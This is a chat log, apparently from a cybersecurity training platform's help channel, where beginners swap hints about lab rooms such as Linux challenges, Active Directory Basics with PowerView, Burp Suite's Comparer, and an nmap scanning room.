yes, but su is wrong
it's asking "how to you specify what shell is used when you use su"
@proven bridge any nudge for CCT, I'm stuck in the 2nd part of the 1st challenge (pcap file), I extracted the ||conversation||, I got the ||key||, but I'm stuck in extracting the exact things that I need to ||decrypt||
@midnight monolith Exactly what Szymex said
@glad hull read the manual!
I AM
I literally guessed it
oh okay now I know sorry I just didn't know (I am beginner)
@fleet pike Thanks, still don't quite get it, but researching the hell out of it atm. 😉 I tried the -u flag to specify the right user, but that didn't work out. I'll keep digging.
weird, tried terminating and re-deploying and then crontab -e worked like a charm. Not too sure what went wrong for me there
in room attacktivedirectory task 3 i get two more ports then the hint and the answer suggest is that expected ?
Windows
Is there a way to get sound on the machine? I am working on flag32 under linux challenges and I need sound for the mp3 file.
^ the browser based machine
Hi, can anyone help with room "Active Directory Basics, Task 8"? I'm having problems trying to find "What is the name of the Windows 10 operating system?" Can you point me in the right direction? Thanks
what commands have you already tried?
systeminfo, as I could not get powerview to work. I have finished all except that one
I'd recommend getting powerview working
you’re going to have trouble without power view
why is powerview not working? What error are you getting / what command are you using
It seems to load but when you run command I get "The term 'Get-NetComputer' is not recognized as the name of a cmdlet"
hold on box has just timed out
I have realised the instruction says ". .\PowerView.ps1" and I did ".\PowerView.ps1" and missed a dot, is that it?
That's the difference between loading a script and running it
so . . indicates running a script
Ahh thanks , going to try now
Thanks guys , completed
also would you know why boxes timeout in hour even though it says 2 hours
With windows? It's a bug that Skidy and Ashu are investigating
On other boxes? We're collecting info as some people have reported that
Hello, I need help with the Linux Walkthrough room, I am stuck at Task 11, question 1, The question says This challenge is pretty simple, create a file named noot.txt it says that i need to run the binary and i will be given the password for shiba2, i made my noot.txt file but how can i run it, it is a txt file not a .bin file. Thanks
nevermind, lol it meant to run the binary file shiba1
@terse kiln File extensions are a lie
Hi People; in Burp, What can we load into Comparer to see differences in what various user roles can access?
Any help would be much appreciated.
@itj66 Try loading burp and typing some names in the answer box
This is question 5 of [Task 11] Decoder and Comparer in Burp Suite. For some reason I'm stumped. The answer format is **** ****
4 asterisks x 4 asterisks
Pretty Please with a cherry on top?
which task?
This is question 5 of [Task 11] Decoder and Comparer in burp suite
So the answer is in the text of task 11?
Yes
So question on connecting to the VPN. I'm on the nmap room, and I wasn't sure how to connect to a machine without any login credentials. I'm familiar with ssh and such for logins, but how do you do it without any logins?
Telnet was refused.
@rancid lion You're not meant to connect to that machine
The VM exists to be scanned
That's all
hello i need help with learnlinux task 11
Help or a hint?
i know how to get the answer but i dont know why
like it says to make a file called noot.txt
then it says to run the binary
i just ./ right?
i dont understand why i cant open it without making the noot.txt file
to get the password i mean
because the binary is a program
And the program was written to give you the password once you create the file
why do i need to make the file noot.txt specifically to run shiba1
You can run it without making the file
But it won't give you the password
The room creator wrote the program
Hey there!
I'm working on the Easy Peasy room. I am stuck at the GOST hash decrypting. I tried it on many websites, even the ones in writeups. But I haven't got any output even after waiting for 30 mins for cracking. Can someone guide me on how do I get past this?
The hint didn't mention any specific website, although I did use the same website that I used to answer the previous questions correctly in this room...
It applies to the whole room
That site isn't particularly reliable, it breaks often for people
Give it like 12 hours and it might work
Ohhkk... Thank You! 😃
Title: Linux Challenge, flag 15.
tried lsb_release, uname and even looked into /proc/
Need a hint
wtf?
That’s the file you need to find
@trim haven got it, ty!
:)
got stuck again. " Flag 16 lies within another system mount."
Mounts are usually CDs/USBs
oh, I should just use search instead of asking
Google is your best friend
jeeeez, i found it
That's awesome
Wut
Tab completion is perfectly legit
how can i run a py script on the webapp
like example.py <target ip> <port>, is that the right syntax?